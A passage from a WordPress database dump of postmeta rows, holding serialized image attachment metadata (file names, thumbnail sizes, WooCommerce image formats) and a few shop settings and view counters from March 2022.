l\";a:5:{s:4:\"file\";s:19:\"bg-01-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:17:\"bg-01-2-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"bg-01-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"bg-01-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"bg-01-2-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"bg-01-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"bg-01-2-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"bg-01-2-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6719,1246,'_wp_attached_file','2022/03/jhgjhjk.png'),(6720,1246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:8000;s:6:\"height\";i:4500;s:4:\"file\";s:19:\"2022/03/jhgjhjk.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"jhgjhjk-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"jhgjhjk-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"jhgjhjk-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"jhgjhjk-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"jhgjhjk-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"jhgjhjk-2048x1152.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"jhgjhjk-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:17:\"jhgjhjk-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"jhgjhjk-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"jhgjhjk-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"jhgjhjk-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"jhgjhjk-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:17:\"jhgjhjk-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:17:\"jhgjhjk-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6721,1230,'_wcfm_vendor_coupon_all_product','yes'),(6723,1230,'show_on_store','yes'),(6724,1230,'sc_is_visible_storewide','yes'),(6725,1251,'_wp_attached_file','2022/03/bulk_booking_form.xlsx'),(6726,1255,'_wp_attached_file','2022/03/bulk_booking_form-3.xlsx'),(6796,1259,'_wp_attached_file','2022/03/Artboard-2-8-2.png'),(6797,1259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-2-8-2.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-2-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-2-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-2-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-2-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6798,1260,'_wp_attached_file','2022/03/Artboard-3-8-3.png'),(6799,1260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-3-8-3.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-3-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-3-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-3-8-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-3-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-3-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-3-8-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-3-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-3-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6800,1261,'_wp_attached_file','2022/03/Artboard-4-8-2.png'),(6801,1261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-4-8-2.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-2-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-2-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-4-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-4-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6802,1262,'_wp_attached_file','2022/03/Artboard-1-8-2.png'),(6803,1262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:26:\"2022/03/Artboard-1-8-2.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-2-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-2-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"Artboard-1-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-2-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"Artboard-1-8-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-2-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6868,1265,'_wp_attached_file','2022/03/16467550021265415014715830241814.jpg'),(6869,1265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:771;s:6:\"height\";i:398;s:4:\"file\";s:44:\"2022/03/16467550021265415014715830241814.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:44:\"16467550021265415014715830241814-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"16467550021265415014715830241814-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"16467550021265415014715830241814-768x396.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:396;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:44:\"16467550021265415014715830241814-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:42:\"16467550021265415014715830241814-50x26.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:44:\"16467550021265415014715830241814-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:44:\"16467550021265415014715830241814-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:42:\"16467550021265415014715830241814-50x26.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:44:\"16467550021265415014715830241814-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:42:\"16467550021265415014715830241814-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:42:\"16467550021265415014715830241814-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6870,1266,'_tc_votes','0'),(6871,1266,'_tc_rate','0'),(6872,1266,'_tc_views','27'),(6873,1266,'_thumbnail_id','1265'),(6874,1268,'_tc_votes','0'),(6875,1268,'_tc_rate','0'),(6876,1268,'_tc_views','41'),(6878,1270,'_wp_attached_file','2022/03/Untitled-2-Recovered-01.png'),(6879,1270,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:35:\"2022/03/Untitled-2-Recovered-01.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-01-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-01-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-01-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-01-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-01-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-01-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-01-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6881,1272,'_wp_attached_file','2022/03/Untitled-2-Recovered-02.png'),(6882,1272,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:35:\"2022/03/Untitled-2-Recovered-02.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-02-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-02-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:36:\"Untitled-2-Recovered-02-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-02-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-02-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-02-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:33:\"Untitled-2-Recovered-02-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6883,1273,'_wp_attached_file','2022/03/Untitled-2-Recovered-03.png'),(6884,1273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:35:\"2022/03/Untitled-2-Recovered-03.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Untitled-2-Recovered-03-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s